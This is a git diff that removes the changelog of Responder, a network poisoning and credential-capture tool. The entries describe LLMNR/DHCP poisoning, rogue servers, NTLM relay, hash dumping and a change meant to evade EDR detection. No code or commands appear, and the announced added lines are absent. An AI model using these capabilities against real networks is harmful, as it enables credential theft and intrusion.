diff --git a/CHANGELOG.md b/CHANGELOG.md
index 755e6a5..99f2880 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,713 +1,424 @@
-
-n.n.n / 2025-05-22
-==================
-
- * added check for aioquic & updated version to reflect recent changes
- * Merge pull request #310 from ctjf/master
- * Merge pull request #308 from BlWasp/error_code_returned
- * Merge pull request #311 from stfnw/master
- * DHCP poisoner: refactor FindIP
- * added quic support based on xpn's work
- * Indentation typos
- * Add status code control
- * Merge pull request #305 from L1-0/patch-1
- * Update RPC.py
- * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
- * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
-
-n.n.n / 2025-05-22
-==================
-
- * added check for aioquic & updated version to reflect recent changes
- * Merge pull request #310 from ctjf/master
- * Merge pull request #308 from BlWasp/error_code_returned
- * Merge pull request #311 from stfnw/master
- * DHCP poisoner: refactor FindIP
- * added quic support based on xpn's work
- * Indentation typos
- * Add status code control
- * Merge pull request #305 from L1-0/patch-1
- * Update RPC.py
- * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
- * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
-# Changelog
-
-All notable changes to this project will be documented in this file.
-
-The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
-and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
-
-
-## Unreleased
-
-[Compare with latest](https://github.com/lgandx/Responder/compare/v3.1.4.0...HEAD)
-
-### Added
-
-- Add options for poisoners ([807bd57](https://github.com/lgandx/Responder/commit/807bd57a96337ab77f2fff50729a6eb229e5dc37) by f3rn0s).
-- Add randomness in TTL value to avoid some EDR detections ([f50f0be](https://github.com/lgandx/Responder/commit/f50f0be59c0de6fd0ff8eef62ba31db96815c878) by nodauf).
-- added support for either resolv.conf or resolvectl ([1a2f2fd](https://github.com/lgandx/Responder/commit/1a2f2fdb22a2bf8b04e0ac99219831457b7ba43a) by lgandx).
-
-### Fixed
-
-- Fixed issue with smb signing detection ([413bc8b](https://github.com/lgandx/Responder/commit/413bc8be3169d215f7d5f251a78c8d8404e52f61) by lgandx).
-- fixed minor bug ([e51f24e](https://github.com/lgandx/Responder/commit/e51f24e36c1f84bc995a690d385c506c35cc6175) by lgandx).
-- Fixed bug when IPv6 is disabled via GRUB. ([fa297c8](https://github.com/lgandx/Responder/commit/fa297c8a16f605bdb731542c67280a4d8bc023c4) by lgandx).
-
-### Removed
-
-- removed debug string ([4b560f6](https://github.com/lgandx/Responder/commit/4b560f6e17493dcfc6bf653d0ebe0547a88735ac) by lgandx).
-- removed bowser listener ([e564e51](https://github.com/lgandx/Responder/commit/e564e5159b9a1bfe3c5f1101b3ab11672e0fd46b) by lgandx).
-
-
-## [v3.1.4.0](https://github.com/lgandx/Responder/releases/tag/v3.1.4.0) - 2024-01-04
-
-[Compare with v3.1.3.0](https://github.com/lgandx/Responder/compare/v3.1.3.0...v3.1.4.0)
-
-### Added
-
-- added LDAPS listener ([6d61f04](https://github.com/lgandx/Responder/commit/6d61f0439c1779767c9ea9840ac433ed98e672cd) by exploide).
-- added:error handling on exceptions. ([f670fba](https://github.com/lgandx/Responder/commit/f670fbaa7fcd3b072aef7cf29f43c1d76d6f13bf) by lgandx).
-- Added full path to gen-self-sign-cert.sh ([69f431e](https://github.com/lgandx/Responder/commit/69f431e58f07c231e75a73b0782855e9277573ac) by kevintellier).
-- add flag (-s) to enable smbv1scan ([cf0c4ee](https://github.com/lgandx/Responder/commit/cf0c4ee659779c027374155716f09b13cb41abb5) by requin).
-- add hostname on smbv2 scan result ([709df2c](https://github.com/lgandx/Responder/commit/709df2c6e18ec2fa6647fdaaa4d9f9e2cb7920f8) by requin).
-- Added dump by legacy protocols ([b8818ed](https://github.com/lgandx/Responder/commit/b8818ed0c47d9d615c4ba1dcff99e8d2d98296d5) by lgandx).
-- added requirements.txt ([00d9d27](https://github.com/lgandx/Responder/commit/00d9d27089d8f02658b08f596d28d1722c276d57) by lgandx).
-- Added: append .local TLD to DontRespondToNames + MDNS bug fix ([0bc226b](https://github.com/lgandx/Responder/commit/0bc226b4beaa84eb3ac26f5d563959ccf567262b) by lgandx).
-- Added Quiet mode ([2cd66a9](https://github.com/lgandx/Responder/commit/2cd66a9b92aa6ca2b7fba0fea03b0a285c186683) by jb).
-
-### Fixed
-
-- Fixed issue in http srv, more hashes & signature reduction. ([66ee7f8](https://github.com/lgandx/Responder/commit/66ee7f8f08f57926f5b3694ffb9e87619eee576f) by lgandx).
-- fixed a TypeError in MSSQLBrowser ([20cdd9c](https://github.com/lgandx/Responder/commit/20cdd9c7c23e620e3d530f76003b94407882e9cd) by exploide).
-- fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+ ([e9bd8a4](https://github.com/lgandx/Responder/commit/e9bd8a43ef353a03ba9195236a3aa5faf3788faa) by exploide).
-- fixed minor bug on py 3.10 ([31393c7](https://github.com/lgandx/Responder/commit/31393c70726206fc1056f76ef6b81a981d7954c5) by lgandx).
-- fixed HTTP basic auth parsing when password contains colons ([dc33d1f](https://github.com/lgandx/Responder/commit/dc33d1f858e9bbc58ae8edf030dbfee208d748f1) by exploide).
-- Fixing soft failure which results in missed SMTP credential interception ([34603ae](https://github.com/lgandx/Responder/commit/34603aed0aadfe3c3625ea729cbc9dc0f06e7e73) by Syntricks).
-- Fixing collections import issue for /tools/MultiRelay/odict.py ([aa8d818](https://github.com/lgandx/Responder/commit/aa8d81861bcdfc3dbf253b617ec044fd4807e9d4) by Shutdown).
-- Fixing import issue like in /tools/odict.py ([2c4cadb](https://github.com/lgandx/Responder/commit/2c4cadbf7dec6e26ec2494a0cfde38655f5bebaf) by Shutdown).
-- fix typo of ServerTlype ([0c80b76](https://github.com/lgandx/Responder/commit/0c80b76f5758dfae86bf4924a49b29c31e2e77f8) by deltronzero).
-- Fixed potential disruption on Proxy-Auth ([c51251d](https://github.com/lgandx/Responder/commit/c51251db5ff311743238b1675d52edb7c6849f00) by lgandx).
-- fixed the RespondTo/DontRespondTo issue ([2765ef4](https://github.com/lgandx/Responder/commit/2765ef4e668bc3493924aae5032e3ec63078ac42) by lgandx).
-
-### Removed
-
-- removed patreon donation link. ([700b7d6](https://github.com/lgandx/Responder/commit/700b7d6222afe3c1d6fb17a0a522e1166e6ad025) by lgandx).
-- removed useless string ([08e44d7](https://github.com/lgandx/Responder/commit/08e44d72acd563910c153749b3c204ce0304bdd1) by lgandx).
-- removed debug ([4ea3d7b](https://github.com/lgandx/Responder/commit/4ea3d7b76554dee5160aaf76a0235074590284f8) by lgandx).
-- Removed Patreon link ([8e12d2b](https://github.com/lgandx/Responder/commit/8e12d2bcfe11cc23e35ea678b9e4979856183d0e) by lgandx).
-- Removed machine accounts dump, since they are not crackable ([c9b5dd0](https://github.com/lgandx/Responder/commit/c9b5dd040e27de95638b33da7a35e5187efb4aac) by lgandx).
-
-## [v3.1.3.0](https://github.com/lgandx/Responder/releases/tag/v3.1.3.0) - 2022-07-26
-
-[Compare with v3.1.2.0](https://github.com/lgandx/Responder/compare/v3.1.2.0...v3.1.3.0)
-
-### Fixed
-
-- Fixed: Warnings on python 3.10 ([9b1c99c](https://github.com/lgandx/Responder/commit/9b1c99ccd29890496b0194c061266997e28be4c0) by lgandx).
-- Fix missing paren error ([0c7a3ff](https://github.com/lgandx/Responder/commit/0c7a3ffabeee77cb9f3d960168a357e9583b2f9f) by cweedon).
-- Fix double logging of first hash or cleartext ([e7eb3bc](https://github.com/lgandx/Responder/commit/e7eb3bcce85c5d437082214c0e8044919cccee56) by Gustaf Blomqvist).
-
-### Removed
-
-- removed -r reference from help msg. ([983a1c6](https://github.com/lgandx/Responder/commit/983a1c6576cb7dfe6cabea93e56dc4f2c557621b) by lgandx).
-- removed -r references ([03fa9a7](https://github.com/lgandx/Responder/commit/03fa9a7187c80586629c58a297d0d78f2f8da559) by lgandx).
-
-## [v3.1.2.0](https://github.com/lgandx/Responder/releases/tag/v3.1.2.0) - 2022-02-12
-
-[Compare with v3.1.1.0](https://github.com/lgandx/Responder/compare/v3.1.1.0...v3.1.2.0)
-
-### Added
-
-- added support for OPT EDNS ([5cf6922](https://github.com/lgandx/Responder/commit/5cf69228cf5ce4c0433904ee1d05955e8fd6f618) by lgandx).
-
-### Fixed
-
-- Fixed options formating in README ([f85ad77](https://github.com/lgandx/Responder/commit/f85ad77d595f5d79b86ddce843bc884f1ff4ac9e) by Andrii Nechytailov).
-
-## [v3.1.1.0](https://github.com/lgandx/Responder/releases/tag/v3.1.1.0) - 2021-12-17
-
-[Compare with v3.0.9.0](https://github.com/lgandx/Responder/compare/v3.0.9.0...v3.1.1.0)
-
-### Added
-
-- Added IPv6 support ([5d4510c](https://github.com/lgandx/Responder/commit/5d4510cc1d0479b13ece9d58ea60d187daf8cdab) by lgandx).
-- added: dhcp inform ([3e8c9fd](https://github.com/lgandx/Responder/commit/3e8c9fdb0eceb3eb1f7c6dbc81502b340a5ca152) by lgandx).
-- Added DHCP DNS vs DHCP WPAD ([76f6c88](https://github.com/lgandx/Responder/commit/76f6c88df31bbd59dc6dceba1b59251012e45f81) by lgandx).
-- Added DHCP DNS vs WPAD srv injection ([9dc7798](https://github.com/lgandx/Responder/commit/9dc779869b5a47fdf26cf79a727ea4a853f0d129) by lgandx).
-- Added date and time for each Responder session config log. ([bb17595](https://github.com/lgandx/Responder/commit/bb17595e3fc9fafa58c8979bebc395ed872ef598) by lgandx).
-
-### Removed
-
-- removed fingerprint.py ([0b56d6a](https://github.com/lgandx/Responder/commit/0b56d6aaeb00406b364cf152b258365393d64ccc) by lgandx).
-
-## [v3.0.9.0](https://github.com/lgandx/Responder/releases/tag/v3.0.9.0) - 2021-12-10
-
-[Compare with v3.0.8.0](https://github.com/lgandx/Responder/compare/v3.0.8.0...v3.0.9.0)
-
-### Added
-
-- added the ability to provide external IP on WPAD poison via DHCP ([ba885b9](https://github.com/lgandx/Responder/commit/ba885b9345024809555d1a2c1f8cc463870602bb) by lgandx).
-- Added a check for MSSQL ([5680487](https://github.com/lgandx/Responder/commit/568048710f0cf5c04c53fd8e026fdd1b3f5c16e6) by lgandx).
-
-### Fixed
-
-- Fixed the ON/OFF for poisoners when in Analyze mode. ([3cd5140](https://github.com/lgandx/Responder/commit/3cd5140c800d8f4e9e8547e4137cafe33fc2f066) by lgandx).
-
-### Removed
-
-- Remove analyze mode on DNS since you need to ARP to get queries ([17e62bd](https://github.com/lgandx/Responder/commit/17e62bda1aed4884c1f08e514faba8c1e39b36ad) by lgandx).
-
-## [v3.0.8.0](https://github.com/lgandx/Responder/releases/tag/v3.0.8.0) - 2021-12-03
-
-[Compare with v3.0.7.0](https://github.com/lgandx/Responder/compare/v3.0.7.0...v3.0.8.0)
-
-### Added
-
-- Added DB for RunFinger results & Report ([f90b76f](https://github.com/lgandx/Responder/commit/f90b76fed202ee4a6e17a030151c8de4430717a8) by lgandx).
-- added timeout option for fine tuning ([a462d1d](https://github.com/lgandx/Responder/commit/a462d1df061b214eebcabdbe3f95caa5dd8ea3c7) by lgandx).
-- added DHCP db & updated the report script to reflect that ([1dfa997](https://github.com/lgandx/Responder/commit/1dfa997da8c0fa1e51a1be30b2a3d5f5d92f4b7f) by lgandx).
-- Added support for single IP or range file. ([02fb3f8](https://github.com/lgandx/Responder/commit/02fb3f8978286a486d633a707889ea8992a7f43a) by lgandx).
-
-### Fixed
-
-- fix: DHCP now working on VPN interface ([88a2c6a](https://github.com/lgandx/Responder/commit/88a2c6a53b721da995fbbd8e5cd82fb40d4af268) by lgandx).
-- Fixed a bug and increased speed. ([1b2a22f](https://github.com/lgandx/Responder/commit/1b2a22facfd54820cc5f8ebba06f5cd996e917dc) by lgandx).
-
-### Removed
-
-- Removed old DHCP script since its now a Responder module. ([d425783](https://github.com/lgandx/Responder/commit/d425783be994b0d2518633e4b93e13e305685e5b) by lgandx).
-- removed default certs ([de778f6](https://github.com/lgandx/Responder/commit/de778f66982817f1149408bc2e080371d3d4a71d) by lgandx).
-- Removed the static certs and added automatic cert generation ([21afd35](https://github.com/lgandx/Responder/commit/21afd357f828b586cfa96992c8c978024285b162) by lgandx).
-- removed debug str ([826b5af](https://github.com/lgandx/Responder/commit/826b5af9e2e37d50afdd3eb3ee66121e6c81c2a2) by lgandx).
-
-## [v3.0.7.0](https://github.com/lgandx/Responder/releases/tag/v3.0.7.0) - 2021-10-26
-
-[Compare with v3.0.6.0](https://github.com/lgandx/Responder/compare/v3.0.6.0...v3.0.7.0)
-
-### Added
-
-- Added DHCP server ([c449b6b](https://github.com/lgandx/Responder/commit/c449b6bcb990959e352967b3842b09978b9b2729) by lgandx).
-- Add --lm switch for ESS downgrade ([dcb80d9](https://github.com/lgandx/Responder/commit/dcb80d992e385a0f0fdd3f724a0b040a42439306) by Pixis).
-- Add ESS disabling information ([51f8ab4](https://github.com/lgandx/Responder/commit/51f8ab43682973df32534ca97c99fb1318a0c77d) by Pixis).
-- Add ESS downgrade parameter ([baf80aa](https://github.com/lgandx/Responder/commit/baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516) by pixis).
-
-### Fixed
-
-- fixed minor isse ([350058c](https://github.com/lgandx/Responder/commit/350058c1795e43c23950b6bd23c33f45795ec7cc) by lgandx).
-
-## [v3.0.6.0](https://github.com/lgandx/Responder/releases/tag/v3.0.6.0) - 2021-04-19
-
-[Compare with v3.0.5.0](https://github.com/lgandx/Responder/compare/v3.0.5.0...v3.0.6.0)
-
-### Added
-
-- Added WinRM rogue server ([8531544](https://github.com/lgandx/Responder/commit/85315442bd010dd61fcb62de8d6ca9cc969426ba) by lgandx).
-
-## [v3.0.5.0](https://github.com/lgandx/Responder/releases/tag/v3.0.5.0) - 2021-04-17
-
-[Compare with v3.0.4.0](https://github.com/lgandx/Responder/compare/v3.0.4.0...v3.0.5.0)
-
-### Added
-
-- Added dce-rpc module + enhancements + bug fix. ([e91e37c](https://github.com/lgandx/Responder/commit/e91e37c9749f58330e0d68ce062a48b100a2d09e) by lgandx).
-
-### Removed
-
-- removed addiontional RR on SRV answers ([027e6b9](https://github.com/lgandx/Responder/commit/027e6b95c3ca89367cb5123758c2fc29aba27a59) by lgandx).
-
-## [v3.0.4.0](https://github.com/lgandx/Responder/releases/tag/v3.0.4.0) - 2021-04-12
-
-[Compare with v3.0.3.0](https://github.com/lgandx/Responder/compare/v3.0.3.0...v3.0.4.0)
-
-### Added
-
-- Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping ([1271b8e](https://github.com/lgandx/Responder/commit/1271b8e17983bd3969d951ce2b4c9b75600f94b9) by lgandx).
-- added a check for exec file ([cc3a5b5](https://github.com/lgandx/Responder/commit/cc3a5b5cfffbb8e7430030aa66a2981feae7fe85) by lgandx).
-- Added donation banner. ([8104139](https://github.com/lgandx/Responder/commit/8104139a3535a49caf7ec0ed64e8e33ea686494f) by lgandx).
-- added donation address and minor typo ([06f9f91](https://github.com/lgandx/Responder/commit/06f9f91f118b0729a74d3c1810a493886655e6f1) by lgandx).
-- added smb filetime support ([b0f044f](https://github.com/lgandx/Responder/commit/b0f044fe4e710597ae73e6f1af87ea246b0cd365) by lgandx).
-
-### Removed
-
-- removed FindSMB2UPTime.py since RunFinger already get this info ([6c51080](https://github.com/lgandx/Responder/commit/6c51080109fd8c9305021336c0dc8c72e01b5541) by lgandx).
-- Removed MultiRelay binaries ([35b12b4](https://github.com/lgandx/Responder/commit/35b12b48323b1960960aba916334635d5a590875) by lgandx).
-- Removed BindShell executable file ([5d762c4](https://github.com/lgandx/Responder/commit/5d762c4a550f2c578f4d7874f24563240276852d) by lgandx).
-- Removed donation banner ([ccee87a](https://github.com/lgandx/Responder/commit/ccee87aa95f2ec16827592ba9d98c4895cec0cb9) by lgandx).
-- removed verification ([dd1a674](https://github.com/lgandx/Responder/commit/dd1a67408081c94490a3263c46b2eb0b6107e542) by lgandx).
-
-## [v3.0.3.0](https://github.com/lgandx/Responder/releases/tag/v3.0.3.0) - 2021-02-08
-
-[Compare with v3.0.2.0](https://github.com/lgandx/Responder/compare/v3.0.2.0...v3.0.3.0)
-
-### Added
-
-- Added support for SMB2 signing ([24e7b7c](https://github.com/lgandx/Responder/commit/24e7b7c667c3c9feb1cd3a25b16bd8d9c2df5ec6) by lgandx).
-- Added SMB2 support for RunFinger and various other checks. ([e24792d](https://github.com/lgandx/Responder/commit/e24792d7743dbf3a5c5ffac92113e36e5d682e42) by lgandx).
-
-### Fixed
-
-- Fix wrong syntax ([fb10d20](https://github.com/lgandx/Responder/commit/fb10d20ea387448ad084a57f5f4441c908fc53cc) by Khiem Doan).
-- fix custom challenge in python3 ([7b47c8f](https://github.com/lgandx/Responder/commit/7b47c8fe4edcb53b035465985d92500b96fb1a84) by ThePirateWhoSmellsOfSunflowers).
-- Fix typos in README ([12b796a](https://github.com/lgandx/Responder/commit/12b796a292b87be15ef8eec31cb276c447b9e8c8) by Laban Sköllermark).
-
-## [v3.0.2.0](https://github.com/lgandx/Responder/releases/tag/v3.0.2.0) - 2020-09-28
-
-[Compare with v3.0.1.0](https://github.com/lgandx/Responder/compare/v3.0.1.0...v3.0.2.0)
-
-### Fixed
-
-- Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface ([af7d27a](https://github.com/lgandx/Responder/commit/af7d27ac8cb3c2b0664a8b0a11940c0f3c25c891) by lgandx).
-
-## [v3.0.1.0](https://github.com/lgandx/Responder/releases/tag/v3.0.1.0) - 2020-08-19
-
-[Compare with v3.0.0.0](https://github.com/lgandx/Responder/compare/v3.0.0.0...v3.0.1.0)
-
-### Added
-
-- Added DNSUpdate.py, a small script to add DNS record to DC for gatering from different VLANs ([05617de](https://github.com/lgandx/Responder/commit/05617defefcd6954915d0b42d73d4ccfcccad2d4) by Sagar-Jangam).
-
-### Fixed
-
-- Fix encoding issue in Python 3 ([7420f62](https://github.com/lgandx/Responder/commit/7420f620825d5a5ae6dc68364a5680910f7f0512) by Sophie Brun).
-
-## [v3.0.0.0](https://github.com/lgandx/Responder/releases/tag/v3.0.0.0) - 2020-01-09
-
-[Compare with v2.3.4.0](https://github.com/lgandx/Responder/compare/v2.3.4.0...v3.0.0.0)
-
-### Added
-
-- Added py3 and py2 compatibility + many bugfix ([b510b2b](https://github.com/lgandx/Responder/commit/b510b2bb2523a3fe24953ac685e697914a60b26c) by lgandx).
-
-## [v2.3.4.0](https://github.com/lgandx/Responder/releases/tag/v2.3.4.0) - 2019-08-17
-
-[Compare with v2.3.3.9](https://github.com/lgandx/Responder/compare/v2.3.3.9...v2.3.4.0)
-
-### Added
-
-- Added RDP rogue server ([c52843a](https://github.com/lgandx/Responder/commit/c52843a5359a143c5a94a74c095d6ac4679cd4b1) by lgandx).
-- Added proper changes to RunFinger (and is not checking for MS17-010 straight away) ([105502e](https://github.com/lgandx/Responder/commit/105502edd401615604e09a9a71a268252c82523d) by Paul A).
-
-### Fixed
-
-- Fix socket timeout on HTTP POST requests ([e7a787c](https://github.com/lgandx/Responder/commit/e7a787cbc4e01e92be6e062e94211dca644fae0c) by Crypt0-M3lon).
-- fixed minor bugfix on recent merge ([38e721d](https://github.com/lgandx/Responder/commit/38e721da9826b95ed3599151559e8f8c535e4d6e) by lgandx).
-- Fix multi HTTP responses ([defabfa](https://github.com/lgandx/Responder/commit/defabfa543f0b567d7e981003c7a00d7f02c3a16) by Clément Notin).
-- Fix version number in settings.py ([621c5a3](https://github.com/lgandx/Responder/commit/621c5a3c125646c14db19fc48f30e4075102c929) by Clément Notin).
-- Fixed some small typos in MS17-010 output ([daaf6f7](https://github.com/lgandx/Responder/commit/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc) by Chris Maddalena).
-
-### Removed
-
-- removed debug string ([47e63ae](https://github.com/lgandx/Responder/commit/47e63ae4ec3266a35845d0bf116cf17fa0d17fd7) by lgandx).
-
-## [v2.3.3.9](https://github.com/lgandx/Responder/releases/tag/v2.3.3.9) - 2017-11-20
-
-[Compare with v2.3.3.8](https://github.com/lgandx/Responder/compare/v2.3.3.8...v2.3.3.9)
-
-### Added
-
-- Added: check for null sessions and MS17-010 ([b37f562](https://github.com/lgandx/Responder/commit/b37f56264a6b57faff81c12a8143662bf1ddb91d) by lgandx).
-- Add ignore case on check body for html inject ([47c3115](https://github.com/lgandx/Responder/commit/47c311553eb38327622d5e6b25e20a662c31c30d) by Lionel PRAT).
-- added support for plain auth ([207b0d4](https://github.com/lgandx/Responder/commit/207b0d455c95a5cd68fbfbbc022e5cc3cb41878f) by lgandx).
-
-## [v2.3.3.8](https://github.com/lgandx/Responder/releases/tag/v2.3.3.8) - 2017-09-05
-
-[Compare with v2.3.3.7](https://github.com/lgandx/Responder/compare/v2.3.3.7...v2.3.3.8)
-
-### Changed
-
-- Changed the complete LDAP parsing hash algo (ntlmv2 bug). ([679cf65](https://github.com/lgandx/Responder/commit/679cf65cff0c537b594d284cd01e2ea9c690d4ae) by lgandx).
-
-## [v2.3.3.7](https://github.com/lgandx/Responder/releases/tag/v2.3.3.7) - 2017-09-05
-
-[Compare with v2.3.3.6](https://github.com/lgandx/Responder/compare/v2.3.3.6...v2.3.3.7)
-
-### Added
-
-- Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 ([5859c31](https://github.com/lgandx/Responder/commit/5859c31e8ecf35c5b12ac653e8ab793bc9270604) by Matt Kelly).
-- Add Microsoft SQL Server Browser responder ([bff935e](https://github.com/lgandx/Responder/commit/bff935e71ea401a4477004022623b1617ac090b3) by Matthew Daley).
-- added: mimi32 cmd, MultiRelay random RPC & Namedpipe & latest mimikatz ([38219e2](https://github.com/lgandx/Responder/commit/38219e249e700c1b20317e0b96f4a120fdfafb98) by lgandx).
-
-### Fixed
-
-- Fixed various bugs and improved the LDAP module. ([be26b50](https://github.com/lgandx/Responder/commit/be26b504b5133c78158d9794cd361ce1a7418775) by lgandx).
-- Fixed space typo in FindSMB2UPTime.py ([11c0096](https://github.com/lgandx/Responder/commit/11c00969c36b2ed51763ee6c975870b05e84cdcb) by myst404).
-- Fixed instances of "CRTL-C" to "CTRL-C" ([44a4e49](https://github.com/lgandx/Responder/commit/44a4e495ccb21098c6b882feb25e636510fc72b9) by Randy Ramos).
-
-## [v2.3.3.6](https://github.com/lgandx/Responder/releases/tag/v2.3.3.6) - 2017-03-29
-
-[Compare with v2.3.3.5](https://github.com/lgandx/Responder/compare/v2.3.3.5...v2.3.3.6)
-
-### Fixed
-
-- Fixed bug in FindSMB2UPTime ([6f3cc45](https://github.com/lgandx/Responder/commit/6f3cc4564c9cf34b75ef5469fd54edd4b3004b54) by lgandx).
-
-### Removed
-
-- Removed Paypal donation link. ([b05bdca](https://github.com/lgandx/Responder/commit/b05bdcab9600ad4e7ef8b70e2d8ee1b03b8b442a) by lgandx).
-
-## [v2.3.3.5](https://github.com/lgandx/Responder/releases/tag/v2.3.3.5) - 2017-02-18
-
-[Compare with v2.3.3.4](https://github.com/lgandx/Responder/compare/v2.3.3.4...v2.3.3.5)
-
-## [v2.3.3.4](https://github.com/lgandx/Responder/releases/tag/v2.3.3.4) - 2017-02-18
-
-[Compare with v2.3.3.3](https://github.com/lgandx/Responder/compare/v2.3.3.3...v2.3.3.4)
-
-### Added
-
-- Added: Hashdump, Stats report ([21d48be](https://github.com/lgandx/Responder/commit/21d48be98fd30a9fd0747588cbbb070ed0ce100b) by lgandx).
-- added `ip` commands in addition to ifconfig and netstat ([db61f24](https://github.com/lgandx/Responder/commit/db61f243c9cc3c9821703c78e780e745703c0bb3) by thejosko).
-
-### Fixed
-
-- fixed crash: typo. ([0642999](https://github.com/lgandx/Responder/commit/0642999741b02de79266c730cc262bb3345644f9) by lgandx).
-- Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string ([de6e869](https://github.com/lgandx/Responder/commit/de6e869a7981d49725e791303bd16c4159d70880) by Gifts).
-- Fix Proxy_Auth. Random challenge broke it. ([5a2ee18](https://github.com/lgandx/Responder/commit/5a2ee18bfaa66ff245747cf8afc114a9a894507c) by Timon Hackenjos).
-
-## [v2.3.3.3](https://github.com/lgandx/Responder/releases/tag/v2.3.3.3) - 2017-01-03
-
-[Compare with v2.3.3.2](https://github.com/lgandx/Responder/compare/v2.3.3.2...v2.3.3.3)
-
-### Added
-
-- Added: Random challenge for each requests (default) ([0d441d1](https://github.com/lgandx/Responder/commit/0d441d1899053fde6792288fc83be0c883df19f0) by lgandx).
-
-## [v2.3.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.3.2) - 2017-01-03
-
-[Compare with v2.3.3.1](https://github.com/lgandx/Responder/compare/v2.3.3.1...v2.3.3.2)
-
-### Added
-
-- Added: Random challenge for each requests (default) ([1d38cd3](https://github.com/lgandx/Responder/commit/1d38cd39af9154f5a9e898428de25fe0afa68d2f) by lgandx).
-- Added paypal button ([17dc81c](https://github.com/lgandx/Responder/commit/17dc81cb6833a91300d0669398974f0ed9bc006e) by lgandx).
-- Added: Scripting support. -c and -d command line switch ([ab2d890](https://github.com/lgandx/Responder/commit/ab2d8907f033384e593a38073e50604a834f4bf3) by lgandx).
-- Added: BTC donation address ([730808c](https://github.com/lgandx/Responder/commit/730808c83c0c7f67370ceeff977b0e727eb28ea4) by lgandx).
-
-### Removed
-
-- Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones. ([4a7499d](https://github.com/lgandx/Responder/commit/4a7499df039269094c718eb9e19760e79eea86f7) by lgandx).
-
-## [v2.3.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.3.1) - 2016-10-18
-
-[Compare with v2.3.3.0](https://github.com/lgandx/Responder/compare/v2.3.3.0...v2.3.3.1)
-
-### Added
-
-- Added: Logs dumped files for multiple targets ([d560105](https://github.com/lgandx/Responder/commit/d5601056b386a7ae3ca167f0562cbe87bf004c38) by lgandx).
-
-### Fixed
-
-- Fixed wrong challenge issue ([027f841](https://github.com/lgandx/Responder/commit/027f841cdf11fd0ad129825dcc70d6ac8b5d3983) by lgandx).
-
-## [v2.3.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.3.0) - 2016-10-12
-
-[Compare with v2.3.2.8](https://github.com/lgandx/Responder/compare/v2.3.2.8...v2.3.3.0)
-
-### Added
-
-- Added: Compability for Multi-Relay ([5b06173](https://github.com/lgandx/Responder/commit/5b0617361ede8df67caad4ca89723ad18a67fa53) by lgandx).
-
-### Fixed
-
-- Fix values for win98 and win10 (requested here: https://github.com/lgandx/Responder/pull/7/commits/d9d34f04cddbd666865089d809eb5b3d46dd9cd4) ([60c91c6](https://github.com/lgandx/Responder/commit/60c91c662607c3991cb760c7dd221e81cfb69518) by lgandx).
-- Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6) ([ce211f7](https://github.com/lgandx/Responder/commit/ce211f7fcfa7ea9e3431161fec5075ca63730070) by lgandx).
-- fixed bug in hash parsing. ([0cf1087](https://github.com/lgandx/Responder/commit/0cf1087010088ef1c3fecc7d2ad851c7c49d0639) by lgandx).
-
-### Changed
-
-- Changed to executable ([3e46ecd](https://github.com/lgandx/Responder/commit/3e46ecd27e53c58c3dc38888a2db1d3340a5a3ab) by lgandx).
-
-## [v2.3.2.8](https://github.com/lgandx/Responder/releases/tag/v2.3.2.8) - 2016-10-06
-
-[Compare with v2.3.2.7](https://github.com/lgandx/Responder/compare/v2.3.2.7...v2.3.2.8)
-
-### Added
-
-- Added: Now delete services on the fly. ([c6e401c](https://github.com/lgandx/Responder/commit/c6e401c2290fbb6c68bbc396915ea3fa7b11b5f0) by lgandx).
-
-## [v2.3.2.7](https://github.com/lgandx/Responder/releases/tag/v2.3.2.7) - 2016-10-05
-
-[Compare with v2.3.2.6](https://github.com/lgandx/Responder/compare/v2.3.2.6...v2.3.2.7)
-
-### Added
-
-- Added: Possibility to target all users. use 'ALL' with -u ([d81ef9c](https://github.com/lgandx/Responder/commit/d81ef9c33ab710f973c68f60cd0b7960f9e4841b) by lgandx).
-
-### Fixed
-
-- Fixed minor bug ([7054c60](https://github.com/lgandx/Responder/commit/7054c60f38cafc7e1c4d8a6ce39e12afbfc8b482) by lgandx).
-
-## [v2.3.2.6](https://github.com/lgandx/Responder/releases/tag/v2.3.2.6) - 2016-10-05
-
-[Compare with v2.3.2.5](https://github.com/lgandx/Responder/compare/v2.3.2.5...v2.3.2.6)
-
-## [v2.3.2.5](https://github.com/lgandx/Responder/releases/tag/v2.3.2.5) - 2016-10-03
-
-[Compare with v2.3.2.4](https://github.com/lgandx/Responder/compare/v2.3.2.4...v2.3.2.5)
-
-### Added
-
-- Added logs folder. ([cd09e19](https://github.com/lgandx/Responder/commit/cd09e19a9363867a75d7db1dea4830969bc0d68e) by lgandx).
-- Added: Cross-protocol NTLMv1-2 relay (beta). ([ab67070](https://github.com/lgandx/Responder/commit/ab67070a2b82e94f2abb506a69f8fa8c0dc09852) by lgandx).
-
-### Removed
-
-- Removed logs folder. ([5d83778](https://github.com/lgandx/Responder/commit/5d83778ac7caba920874dc49f7523c6ef80b6d7b) by lgandx).
-
-## [v2.3.2.4](https://github.com/lgandx/Responder/releases/tag/v2.3.2.4) - 2016-09-12
-
-[Compare with v2.3.2.3](https://github.com/lgandx/Responder/compare/v2.3.2.3...v2.3.2.4)
-
-## [v2.3.2.3](https://github.com/lgandx/Responder/releases/tag/v2.3.2.3) - 2016-09-12
-
-[Compare with v2.3.2.2](https://github.com/lgandx/Responder/compare/v2.3.2.2...v2.3.2.3)
-
-### Added
-
-- Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On. ([35d933d](https://github.com/lgandx/Responder/commit/35d933d5964df607ec714ced93e4cb197ff2bfe7) by lgandx).
-
